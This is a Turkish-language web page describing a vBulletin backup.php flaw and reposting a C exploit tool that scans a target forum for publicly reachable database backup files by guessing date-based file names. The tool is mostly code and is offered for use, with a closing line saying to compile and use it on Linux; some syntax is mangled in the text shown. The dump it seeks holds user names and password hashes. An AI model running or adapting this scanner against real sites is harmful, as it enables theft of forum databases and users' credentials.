VBulletin backup.php Açığ
VBulletin backup.php Açığı
backup.php scriptinde çok güzel bir açık var. vertabanı yedeğini alırker şifre istemior. eğer site sahibi veya admin default adlı klasörün uzantısıyla oynamamışsa bir üye bunu tahmin edebilip indirebiliyo. bu dosyanın içindede her kullanıcının kullanıcı adı şifre hashleri ve birçok özeli var Exploit ; #include #include #include #include #include #include #include #define SERVER_PORT 80 char *getdate(int b){ static char datestring[40]; time_t ttt; int minustime; minustime=86400 * b; ttt=time(NULL)- minustime; strftime (datestring, sizeof(datestring), "%m-%d-%Y", localtime(&ttt)); printf("Searching: forumbackup-%s.sqln", datestring); return(datestring); } char *getdate2(int b){ static char datestring[40]; time_t ttt; int minustime; minustime=86400 * b; ttt=time(NULL)- minustime; strftime (datestring, sizeof(datestring), "%Y-%d-%m", localtime(&ttt)); printf("Searching: forumbackup-%s.sqln", datestring); return(datestring); } char *getdate3(int b){ static char datestring[40]; time_t ttt; int minustime; minustime=86400 * b; ttt=time(NULL)- minustime; strftime (datestring, sizeof(datestring), "%d-%m-%Y", localtime(&ttt)); printf("Searching: forumbackup-%s.sqln", datestring); return(datestring); } char *getdate4(int b){ static char datestring[40]; time_t ttt; int minustime; minustime=86400 * b; ttt=time(NULL)- minustime; strftime (datestring, sizeof(datestring), "%m.%d.%Y", localtime(&ttt)); // hals1 printf("Searching: forumbackup-%s.sqln", datestring); return(datestring); } char *getdate5(int b){ static char datestring[40]; time_t ttt; int minustime; minustime=86400 * b; ttt=time(NULL)- minustime; strftime (datestring, sizeof(datestring), "%Y.%d.%m", localtime(&ttt)); // hals1 printf("Searching: forumbackup-%s.sqln", datestring); return(datestring); } char *getdate6(int b){ static char datestring[40]; time_t ttt; int minustime; minustime=86400 * b; ttt=time(NULL)- minustime; strftime (datestring, sizeof(datestring), "%d.%m.%Y", localtime(&ttt)); // hals1 printf("Searching: forumbackup-%s.sqln", datestring); return(datestring); } char *getdate7(int b){ static char datestring[40]; time_t ttt; int minustime; minustime=86400 * b; ttt=time(NULL)- minustime; strftime (datestring, sizeof(datestring), "%d%m%Y", localtime(&ttt)); // Tyn0r printf("Searching: forumbackup-%s.sqln", datestring); return(datestring); } main(int argc, char *argv[]) { char buffer[1000],host[255],path[255],dog[255],c; int sd, rc, i=0, d=0, b; struct sockaddr_in localAddr, servAddr; struct hostent *h; char *http = "Accept: */*rn" "Accept-Language: en-us,en;q=0.5rn" "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7rn" "User-Agent: we want your backups - milw0rmrn" "Connection: closernrn"; if ( argc != 5) { printf("vBulletin <= 3.0.8 Accessible Database Backup Searcher /str0ke ! milw0rm.comn"); printf("usage: %s -h hostname/ip -p /path/ n",argv[0]); exit(0); } while ((c = getopt (argc, argv, "h
:" != EOF) switch(c) { case ’h’: strncpy(host,optarg,sizeof(host)); break; case ’p’: strncpy(path,optarg,sizeof(path)); break; } h = gethostbyname(host); if(h==NULL) { printf("Unknown Host ’%s’n",host); exit(1); } printf("Trying To Connect To [%s]n",host); while(1){ servAddr.sin_family = h->h_addrtype; memcpy((char *) &servAddr.sin_addr.s_addr, h->h_addr_list[0], h->h_length); servAddr.sin_port = htons(SERVER_PORT); sd = socket(AF_INET, SOCK_STREAM, 0); if(sd<0) { perror("Can Not Open The Socketn"); exit(1); } localAddr.sin_family = AF_INET; localAddr.sin_addr.s_addr = htonl(INADDR_ANY); localAddr.sin_port = htons(0); rc = bind(sd, (struct sockaddr *) &localAddr, sizeof(localAddr)); if(rc<0) { printf("%d: cannot bind port TCP %un",sd,SERVER_PORT); perror("error "); exit(1); } rc = connect(sd, (struct sockaddr *) &servAddr, sizeof(servAddr)); if(rc<0) { perror("cannot connectn"); exit(1); } memset(buffer,0,sizeof(buffer)); if ( d == 0 ) { snprintf(buffer,sizeof(buffer), "HEAD %s/forumbackup-%s.sql HTTP/1.1rnHost: %srn%s",path,getdate(i),host,http); } else if ( d == 1 ) { snprintf(buffer,sizeof(buffer), "HEAD %s/forumbackup-%s.sql HTTP/1.1rnHost: %srn%s",path,getdate2(i),host,http); } else if ( d == 2 ) { snprintf(buffer,sizeof(buffer), "HEAD %s/forumbackup-%s.sql HTTP/1.1rnHost: %srn%s",path,getdate3(i),host,http); } else if ( d == 3 ) { snprintf(buffer,sizeof(buffer), "HEAD %s/forumbackup-%s.sql HTTP/1.1rnHost: %srn%s",path,getdate4(i),host,http); } else if ( d == 4 ) { snprintf(buffer,sizeof(buffer), "HEAD %s/forumbackup-%s.sql HTTP/1.1rnHost: %srn%s",path,getdate5(i),host,http); } else if ( d == 5 ) { snprintf(buffer,sizeof(buffer), "HEAD %s/forumbackup-%s.sql HTTP/1.1rnHost: %srn%s",path,getdate6(i),host,http); } else if ( d == 6 ) { snprintf(buffer,sizeof(buffer), "HEAD %s/forumbackup-%s.sql HTTP/1.1rnHost: %srn%s",path,getdate7(i),host,http); } rc = send(sd,buffer, strlen(buffer), 0); memset(buffer,0,sizeof(buffer)); while(1) { rc=recv(sd,buffer,sizeof(buffer),0); if(strstr(buffer,"404" break; if(strstr(buffer,"200 OK" { if ( d == 0 ) { printf("Database backup found: %s%sforumbackup-%s.sqln", host, path, getdate(i)); } if ( d == 1 ) { printf("Database backup found: %s%sforumbackup-%s.sqln", host, path, getdate2(i)); } if ( d == 2 ) { printf("Database backup found: %s%sforumbackup-%s.sqln", host, path, getdate3(i)); } if ( d == 3 ) { printf("Database backup found: %s%sforumbackup-%s.sqln", host, path, getdate4(i)); } if ( d == 4 ) { printf("Database backup found: %s%sforumbackup-%s.sqln", host, path, getdate5(i)); } if ( d == 5 ) { printf("Database backup found: %s%sforumbackup-%s.sqln", host, path, getdate6(i)); } if ( d == 6 ) { printf("Database backup found: %s%sforumbackup-%s.sqln", host, path, getdate7(i)); } exit(0); } memset(buffer,0,sizeof(buffer)); } close(sd); if ( d < 6 ) { d++; } else { d=0; i++; } } } Kaynak:turkishajan.org
yukaridaki Cohttp://www.turkishajan.orgde ( C ) Linux da derleyip kullanabilirsiniz..
<<Önceki Sayfa
|/|Sonraki Sayfa>>
Yorum yaz! :
Arkadasina Gonder!
0yorum yazilmistir
Bağlantılar
Web Stats